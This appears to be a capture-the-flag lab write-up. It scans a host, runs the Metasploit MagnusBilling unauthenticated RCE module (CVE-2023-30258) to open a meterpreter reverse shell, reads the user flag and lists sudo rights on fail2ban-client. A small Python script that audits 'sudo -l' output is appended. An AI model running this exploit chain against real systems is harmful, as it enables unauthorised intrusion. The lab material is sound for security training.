Nmap
root@ip-10-10-5-83:~# nmap -sV -p- -Pn 10.10.240.98
Starting Nmap 7.80 ( https://nmap.org ) at 2025-06-26 14:18 BST
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 75.00% done; ETC: 14:18 (0:00:02 remaining)
Nmap scan report for ip-10-10-240-98.eu-west-1.compute.internal (10.10.240.98)
Host is up (0.00021s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.62 ((Debian))
3306/tcp open mysql MariaDB (unauthorized)
5038/tcp open asterisk Asterisk Call Manager 2.10.6
MAC Address: 02:0E:AF:EC:F2:FB (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.77 seconds
Website

MSFconsole
msf6 > search magnusbilling
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258 2023-06-26 excellent Yes MagnusBilling application unauthenticated Remote Command Execution.
1 \_ target: PHP . . . .
2 \_ target: Unix Command . . . .
3 \_ target: Linux Dropper . . . .
Interact with a module by name or index. For example info 3, use 3 or use exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258
After interacting with a module you can manually set a TARGET with set TARGET 'Linux Dropper'
msf6 > use 0
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > show options
Module options (exploit/linux/http/magnusbilling_unauth_rce_cve_2023_30258):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /mbilling yes The MagnusBilling endpoint URL
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
When TARGET is 0:
Name Current Setting Required Description
---- --------------- -------- -----------
WEBSHELL no The name of the webshell with extension. Webshell name will be randomly generated if left unset.
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 PHP
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set RHOSTS 10.10.240.98
RHOSTS => 10.10.240.98
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > run
[-] Msf::OptionValidateError One or more options failed to validate: LHOST.
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > set LHOST 10.10.11.165
LHOST => 10.10.11.165
msf6 exploit(linux/http/magnusbilling_unauth_rce_cve_2023_30258) > run
[*] Started reverse TCP handler on 10.10.11.165:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 10.10.240.98:80 can be exploited.
[*] Performing command injection test issuing a sleep command of 6 seconds.
[*] Elapsed time: 6.29 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (40004 bytes) to 10.10.240.98
[+] Deleted YKavsSSitm.php
[*] Meterpreter session 1 opened (10.10.11.165:4444 -> 10.10.240.98:40470) at 2025-06-26 14:56:22 +0100
ls
meterpreter > ls
Listing: /var/www/html/mbilling/lib/icepay
==========================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100700/rwx------ 768 fil 2024-02-27 19:44:28 +0000 icepay-cc.php
100700/rwx------ 733 fil 2024-02-27 19:44:28 +0000 icepay-ddebit.php
100700/rwx------ 736 fil 2024-02-27 19:44:28 +0000 icepay-directebank.php
100700/rwx------ 730 fil 2024-02-27 19:44:28 +0000 icepay-giropay.php
100700/rwx------ 671 fil 2024-02-27 19:44:28 +0000 icepay-ideal.php
100700/rwx------ 720 fil 2024-02-27 19:44:28 +0000 icepay-mistercash.php
100700/rwx------ 710 fil 2024-02-27 19:44:28 +0000 icepay-paypal.php
100700/rwx------ 699 fil 2024-02-27 19:44:28 +0000 icepay-paysafecard.php
100700/rwx------ 727 fil 2024-02-27 19:44:28 +0000 icepay-phone.php
100700/rwx------ 723 fil 2024-02-27 19:44:28 +0000 icepay-sms.php
100700/rwx------ 699 fil 2024-02-27 19:44:28 +0000 icepay-wire.php
100700/rwx------ 25097 fil 2024-03-27 19:55:23 +0000 icepay.php
100644/rw-r--r-- 0 fil 2024-09-13 10:17:00 +0100 null
meterpreter >
meterpreter > ls
Listing: /home/magnus
=====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
020666/rw-rw-rw- 0 cha 2025-06-26 14:56:19 +0100 .bash_history
100600/rw------- 220 fil 2024-03-27 19:45:39 +0000 .bash_logout
100600/rw------- 3526 fil 2024-03-27 19:45:39 +0000 .bashrc
040700/rwx------ 4096 dir 2024-09-09 13:01:09 +0100 .cache
040700/rwx------ 4096 dir 2024-03-27 19:47:04 +0000 .config
040700/rwx------ 4096 dir 2024-09-09 13:01:09 +0100 .gnupg
040700/rwx------ 4096 dir 2024-03-27 19:46:12 +0000 .local
100700/rwx------ 807 fil 2024-03-27 19:45:39 +0000 .profile
040700/rwx------ 4096 dir 2024-03-27 19:46:17 +0000 .ssh
040700/rwx------ 4096 dir 2024-03-27 19:46:12 +0000 Desktop
040700/rwx------ 4096 dir 2024-03-27 19:46:12 +0000 Documents
040700/rwx------ 4096 dir 2024-03-27 19:46:12 +0000 Downloads
040700/rwx------ 4096 dir 2024-03-27 19:46:12 +0000 Music
040700/rwx------ 4096 dir 2024-03-27 19:46:12 +0000 Pictures
040700/rwx------ 4096 dir 2024-03-27 19:46:12 +0000 Public
040700/rwx------ 4096 dir 2024-03-27 19:46:12 +0000 Templates
040700/rwx------ 4096 dir 2024-03-27 19:46:12 +0000 Videos
100644/rw-r--r-- 38 fil 2024-03-27 21:44:18 +0000 user.txt
meterpreter > cat user.txt
THM{4a6831d5f124b25eefb1e92e0f0da4ca}
sudo -l
Matching Defaults entries for asterisk on ip-10-10-240-98:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
Runas and Command-specific defaults for asterisk:
Defaults!/usr/bin/fail2ban-client !requiretty
User asterisk may run the following commands on ip-10-10-240-98:
(ALL) NOPASSWD: /usr/bin/fail2ban-client
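
Added example (not part of the original notes): a small Python audit that parses `sudo -l` output like the listing above and reports every rule that lets the account run a command as another user without a password. The function name `audit_sudo_listing` and the field names are hypothetical; the sample text is constructed from the lines shown above.

```python
import re

# Constructed sample: the `sudo -l` listing from the notes above.
SAMPLE = r"""Matching Defaults entries for asterisk on ip-10-10-240-98:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
Runas and Command-specific defaults for asterisk:
    Defaults!/usr/bin/fail2ban-client !requiretty
User asterisk may run the following commands on ip-10-10-240-98:
    (ALL) NOPASSWD: /usr/bin/fail2ban-client
"""

USER_RE = re.compile(r"^User (\S+) may run the following commands on (\S+):$")
# "(runas[:group]) [TAG: ...] command[, command ...]"
RULE_RE = re.compile(r"^\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)$")


def audit_sudo_listing(text):
    """Return one finding per command runnable as another user without a password."""
    findings, user, host = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        m = USER_RE.match(line)
        if m:
            user, host = m.group(1), m.group(2)
            continue
        m = RULE_RE.match(line)
        if not (user and m):
            continue  # Defaults lines and anything before the rules header
        runas = m.group(1).split(":")[0].strip()
        tags = {t.strip() for t in m.group(2).split(":") if t.strip()}
        if "NOPASSWD" not in tags:
            continue
        # Assumption: commands are separated by plain commas (no escaped "\," in args).
        for cmd in (c.strip() for c in m.group(3).split(",")):
            findings.append({
                "user": user, "host": host, "runas": runas, "command": cmd,
                # runas ALL or root means the command executes with root privileges
                "as_root": runas in ("ALL", "root"),
                # a bare path with no arguments pins nothing: any arguments are allowed
                "any_args": " " not in cmd,
            })
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_listing(SAMPLE):
        print(finding)
```

A finding with both `as_root` and `any_args` set, on a service account such as `asterisk`, is the combination to review first when tightening sudoers.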